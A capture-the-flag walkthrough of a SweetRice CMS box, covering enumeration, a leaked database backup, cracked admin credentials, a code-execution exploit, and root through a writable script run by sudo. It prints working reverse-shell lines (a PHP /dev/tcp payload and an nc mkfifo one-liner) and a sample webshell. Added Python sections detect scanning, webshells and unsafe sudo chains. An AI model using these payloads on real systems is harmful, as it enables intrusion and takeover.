[Enumeration]
1. Port scan
nmap -Pn <ip>
There are 2 open ports: 22 and 80.
2. OS and service scan
nmap -A -p 22,80 <ip>
3. Access HTTP site
Nothing much.
View the page source: nothing much.
4. Directory scan with gobuster.
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://<ip>/ -x php,txt,html,sh,cgi
There’s a “/content” directory.
5. Access “/content”
It’s the SweetRice CMS. Nothing much here.
View the page source. Nothing much.
Inspect element: there’s a cookie named “sweetrice”.
6. Further enumeration in “/content”.
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.10.94.163/content/ -x php,txt,html,sh,cgi
Access “/images/”
Access “/license.txt”
Access “/js/”
Access “/changelog.txt”
It’s version 1.5.0.
Access “/inc”
There are interesting files and directories: cache, lastest.txt, and mysql_backup.
Access “/inc/cache/”
There’s a file named “cache.db”.
Download it.
wget http://<ip>/content/inc/cache/cache.db
Read the file.
cat cache.db
Not much of use.
Access “/inc/lastest.txt”
It seems this CMS is 1.5.1. Now there are 2 possible version numbers: 1.5.0 and 1.5.1.
Access “/inc/mysql_backup”
There’s a file.
Download it.
wget http://10.10.94.163/content/inc/mysql_backup/mysql_bakup_20191129023059-1.5.1.sql
Read the file.
I have to adjust the lines in the file for easier viewing.
It seems there are some credentials.
Let’s crack the MD5 hash with CrackStation.
It’s Password123.
My guess:
admin: Password123
manager: Password123
Access “/as”
Now I’ve found the admin panel.
Let’s log in with the guessed credentials.
admin:Password123
Failed!!!
Try another one
manager:Password123
Success!!!
Let’s continue the directory enumeration.
Access “/_themes”; there’s a “default” directory.
Access “/_themes/default/”: nothing much.
Access “/attachment”: nothing much.
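A defender-side view of the enumeration above, added here as an example; it is not part of the original writeup. The Python below parses Apache combined-format access log lines, flags any client whose 404s exceed a threshold inside a sliding time window (the trace a gobuster run leaves behind), and reports successful fetches of the kind of exposed paths found above (mysql_backup, cache.db, lastest.txt, inc/ads). The log lines, client IPs, user agents, threshold and window are constructed assumptions, not data from the target.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed Apache "combined"-format access log (sample data, not from the original
# writeup). 10.0.0.5 imitates a directory brute-force: a burst of 404s followed by
# successful downloads of the backup and cache files. 10.0.0.9 is an ordinary visitor.
SAMPLE_LOG = """\
10.0.0.5 - - [29/Nov/2019:02:30:01 +0000] "GET /content/admin HTTP/1.1" 404 196 "-" "gobuster/3.0"
10.0.0.5 - - [29/Nov/2019:02:30:01 +0000] "GET /content/backup HTTP/1.1" 404 196 "-" "gobuster/3.0"
10.0.0.5 - - [29/Nov/2019:02:30:01 +0000] "GET /content/test.php HTTP/1.1" 404 196 "-" "gobuster/3.0"
10.0.0.5 - - [29/Nov/2019:02:30:02 +0000] "GET /content/old.txt HTTP/1.1" 404 196 "-" "gobuster/3.0"
10.0.0.5 - - [29/Nov/2019:02:30:02 +0000] "GET /content/db.sh HTTP/1.1" 404 196 "-" "gobuster/3.0"
10.0.0.5 - - [29/Nov/2019:02:30:02 +0000] "GET /content/login.html HTTP/1.1" 404 196 "-" "gobuster/3.0"
10.0.0.5 - - [29/Nov/2019:02:30:03 +0000] "GET /content/config.cgi HTTP/1.1" 404 196 "-" "gobuster/3.0"
10.0.0.5 - - [29/Nov/2019:02:30:03 +0000] "GET /content/tmp HTTP/1.1" 404 196 "-" "gobuster/3.0"
10.0.0.5 - - [29/Nov/2019:02:30:03 +0000] "GET /content/data HTTP/1.1" 404 196 "-" "gobuster/3.0"
10.0.0.5 - - [29/Nov/2019:02:30:04 +0000] "GET /content/private HTTP/1.1" 404 196 "-" "gobuster/3.0"
10.0.0.5 - - [29/Nov/2019:02:30:04 +0000] "GET /content/inc HTTP/1.1" 301 312 "-" "gobuster/3.0"
10.0.0.5 - - [29/Nov/2019:02:30:20 +0000] "GET /content/inc/cache/cache.db HTTP/1.1" 200 4096 "-" "Wget/1.20"
10.0.0.5 - - [29/Nov/2019:02:30:41 +0000] "GET /content/inc/mysql_backup/mysql_bakup_20191129023059-1.5.1.sql HTTP/1.1" 200 8192 "-" "Wget/1.20"
10.0.0.9 - - [29/Nov/2019:02:31:00 +0000] "GET /content/ HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.9 - - [29/Nov/2019:02:31:05 +0000] "GET /content/favicon.ico HTTP/1.1" 404 196 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# Path fragments that hold data a CMS install should never serve to anonymous clients
# (assumption modelled on the paths seen during the enumeration above).
SENSITIVE_PATHS = ("/inc/mysql_backup/", "/inc/cache/", "/inc/lastest.txt", "/inc/ads/")


def parse_line(line):
    """Return the fields we need from one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
        "path": m["path"],
        "status": int(m["status"]),
    }


def burst_exceeds(timestamps, threshold, window_seconds):
    """True if any sliding window of window_seconds holds at least `threshold` events."""
    ts = sorted(timestamps)
    start = 0
    for end in range(len(ts)):
        while (ts[end] - ts[start]).total_seconds() > window_seconds:
            start += 1
        if end - start + 1 >= threshold:
            return True
    return False


def analyse(log_text, threshold=10, window_seconds=60):
    """Flag scanning clients and successful requests for sensitive paths."""
    not_found = defaultdict(list)
    sensitive_hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["status"] == 404:
            not_found[rec["ip"]].append(rec["ts"])
        if rec["status"] == 200 and any(p in rec["path"] for p in SENSITIVE_PATHS):
            sensitive_hits.append((rec["ip"], rec["path"]))
    scanners = sorted(ip for ip, stamps in not_found.items()
                      if burst_exceeds(stamps, threshold, window_seconds))
    return {"scanners": scanners, "sensitive_hits": sensitive_hits}


if __name__ == "__main__":
    report = analyse(SAMPLE_LOG)
    for ip in report["scanners"]:
        print(f"possible directory brute-force from {ip}")
    for ip, path in report["sensitive_hits"]:
        print(f"sensitive path served to {ip}: {path}")
```

The sensitive-path check matters more than the 404 burst: the backup and cache directories are the real exposure here, and a single 200 on them is worth an alert even from a client that never tripped the scan threshold. Those directories should also be denied at the web server rather than only watched.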
[Exploitation]
1. Search for exploits
searchsploit sweetrice
There’s a code-execution exploit.
2. Copy and read it
searchsploit -m 40700
Read the file.
It seems I have to access the admin panel -> Ads section.
This seems like the result of the exploit.
3. Test the exploit
Back to the admin panel -> Ads section. This section may be exploited by following the exploit document/script.
Let’s change the IP and path in the code first.
Copy and paste the code. Click done.
Nothing happens. It seems I need an Ads name.
Let’s read the code again. The underlined strings “hacked” may be connected.
Try adding the code again; this time I will input the Ads name as “hacked”.
Success!!!
I edit the path in the code to remind myself.
Let’s access “/content/inc”. There’s a new directory, “ads”.
There’s a file, “hacked.php”.
Access it. It seems the exploit is successful.
4. Get reverse shell
Create a listener
nc -lvp 1234
Create a PHP reverse shell
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/<ip>/1234 0>&1'"); ?>
Copy and paste it into the code. I also change the value to “shell”.
Let’s create the exploit file in admin panel.
Now I have shell file in “/content/inc/ads”.
Access it.
Now I have reverse shell.
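What makes the step above work is that the Ads feature writes attacker-supplied text as a .php file into inc/ads, a directory that should only ever hold content. As an added example (not code from the page or from SweetRice), here is a Python scan a defender could run over the web root: a PHP file inside a designated data directory is reported as high severity, and a PHP file anywhere that calls a command-execution function is reported for review. The directory tree it builds, the data-directory list and the sample files are constructed; the list is an assumption modelled on the paths seen in this writeup.

```python
import re
import tempfile
from pathlib import Path

# Directories (relative to the web root) that hold uploads, caches or generated content.
# A CMS writes data here, so a .php file appearing in them is a strong webshell signal.
# Assumption modelled on the paths seen above, not SweetRice's own layout.
DATA_DIRS = ("inc/ads", "inc/cache", "inc/mysql_backup", "attachment", "images")

# PHP functions that hand a string to the shell or the interpreter.
DANGEROUS_CALL = re.compile(
    r"\b(exec|shell_exec|system|passthru|popen|proc_open|eval)\s*\(", re.IGNORECASE
)


def scan_webroot(root):
    """Return findings for every .php file under root, sorted by path.

    severity "high":   PHP inside a data directory (code where only content belongs).
    severity "review": PHP elsewhere that calls a command-execution function.
    """
    root = Path(root)
    findings = []
    for php in root.rglob("*.php"):
        rel = php.relative_to(root).as_posix()
        in_data_dir = any(rel.startswith(d + "/") for d in DATA_DIRS)
        text = php.read_text(errors="replace")
        calls = sorted({m.group(1).lower() for m in DANGEROUS_CALL.finditer(text)})
        if in_data_dir:
            severity = "high"
        elif calls:
            severity = "review"
        else:
            continue
        findings.append({"path": rel, "severity": severity, "calls": calls})
    return sorted(findings, key=lambda f: f["path"])


def build_fixture():
    """Constructed web root (not a real SweetRice install): one benign PHP file, one
    library file that shells out, a text ad, and a PHP file dropped into inc/ads."""
    root = Path(tempfile.mkdtemp(prefix="webroot-"))
    (root / "inc" / "ads").mkdir(parents=True)
    (root / "inc" / "lib").mkdir(parents=True)
    (root / "index.php").write_text('<?php echo "hello"; ?>\n')
    (root / "inc" / "lib" / "mail.php").write_text('<?php $h = popen("sendmail -t", "w"); ?>\n')
    (root / "inc" / "ads" / "banner.txt").write_text("<a href=/promo>sale</a>\n")
    # Sample webshell-style payload, present only so the scanner has something to catch.
    (root / "inc" / "ads" / "hacked.php").write_text('<?php exec($_GET["c"]); ?>\n')
    return root


if __name__ == "__main__":
    for f in scan_webroot(build_fixture()):
        print(f'{f["severity"]:6} {f["path"]} calls={f["calls"]}')
```

Scanning is the detective control; the preventive one is to have the web server refuse to execute PHP in those data directories at all, so that a file written there is served as text or denied instead of run.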
5. Let’s explore the machine
id
I’m www-data.
cd /home
ls
cd itguy
ls
cat user.txt
cat mysql_login.txt
cat backup.pl
It’s a Perl script and it calls “/sh”.
[Privilege Escalation]
1. Verify sudo rights.
sudo -l
Since “backup.pl” calls “sh” to get a shell and I can run perl with sudo privileges, maybe I can get root access by combining the two.
sudo /usr/bin/perl /home/itguy/backup.pl
Failed. The machine crashed. I have to stop the shell and redo the step of getting a reverse shell.
Let’s give it another try.
This time I have to read it more carefully.
cat backup.pl
There’s “/etc/copy.sh”.
Read it.
cat /etc/copy.sh
It’s a reverse shell to some machine.
Prepare the command by copying it and changing the IP and port number.
Replace the old script.
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ip> 1236 >/tmp/f" > /etc/copy.sh
Verify the script.
cat /etc/copy.sh
2. Let’s exploit
Create another listener
nc -lvp 1236
Run the command
sudo /usr/bin/perl /home/itguy/backup.pl
Back to the reverse shell; I have to wait a while until I get the shell.
id
Now I’m root.
cd /root
ls
cat root.txt
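The escalation works because a sudo rule lets the web user run perl on backup.pl as root, and that script shells out to /etc/copy.sh, which an unprivileged user can overwrite. The following Python audit is an added example (not part of the original writeup) of the check an administrator would run before granting such a rule: it takes the command part of a sudoers entry, checks every file it names for group/world-writable permissions, follows absolute paths referenced inside text scripts (such as the argument of a system() call) and checks those too, and also flags writable parent directories. The sudoers entry it audits is assumed to have the form "/usr/bin/perl /home/itguy/backup.pl", as the command used above suggests; the files it builds in a temporary directory are a constructed stand-in, not the real backup.pl or copy.sh.

```python
import re
import stat
import tempfile
from pathlib import Path

# Absolute paths mentioned inside a script body, e.g. the argument of a system() call.
ABS_PATH_RE = re.compile(r"(?<![\w.])(/[\w./-]+)")


def writable_by_others(path):
    """True if the group or world write bit is set on path."""
    return bool(path.stat().st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def referenced_files(script):
    """Absolute paths named in a text script that exist as regular files.
    Binaries (anything containing a NUL byte) are not searched."""
    data = script.read_bytes()
    if b"\0" in data:
        return []
    text = data.decode("utf-8", errors="replace")
    return [Path(p) for p in ABS_PATH_RE.findall(text) if Path(p).is_file()]


def audit_rule(command, max_depth=3):
    """Audit the command part of a sudoers entry, e.g.
    '/usr/bin/perl /home/itguy/backup.pl'.

    Every absolute path in the rule is checked, then every file a text script
    references, down to max_depth levels. Returns a list of (path, reason)."""
    findings = []
    seen = set()
    queue = [(Path(tok), 0) for tok in command.split() if tok.startswith("/")]
    while queue:
        path, depth = queue.pop(0)
        if path in seen or not path.is_file():
            continue
        seen.add(path)
        if writable_by_others(path):
            findings.append((str(path), "file is group/world writable"))
        parent_mode = path.parent.stat().st_mode
        if writable_by_others(path.parent) and not (parent_mode & stat.S_ISVTX):
            findings.append((str(path), "parent directory is group/world writable"))
        if depth < max_depth:
            queue.extend((child, depth + 1) for child in referenced_files(path))
    return findings


def build_fixture():
    """Constructed stand-in for the box (not the real files): a Perl script run via
    sudo that shells out to a helper script an unprivileged user can overwrite."""
    root = Path(tempfile.mkdtemp(prefix="sudo-audit-"))
    home = root / "home" / "itguy"
    etc = root / "etc"
    home.mkdir(parents=True)
    etc.mkdir()
    for d in (home, etc, home.parent):
        d.chmod(0o755)
    helper = etc / "copy.sh"
    helper.write_text('#!/bin/sh\necho "backup done"\n')
    helper.chmod(0o777)  # the weak permission the audit should catch
    script = home / "backup.pl"
    script.write_text(f'#!/usr/bin/perl\nsystem("{helper}");\n')
    script.chmod(0o755)
    return root, f"/usr/bin/perl {script}"


if __name__ == "__main__":
    _, rule = build_fixture()
    for path, reason in audit_rule(rule) or [("-", "no findings")]:
        print(f"{path}: {reason}")
```

The audit only follows literal absolute paths, so a script that builds the path at runtime or calls a bare command name resolved through PATH would slip past it; the fix on the host side is the same either way: every file in the chain a sudo rule reaches must be owned by root and writable only by root.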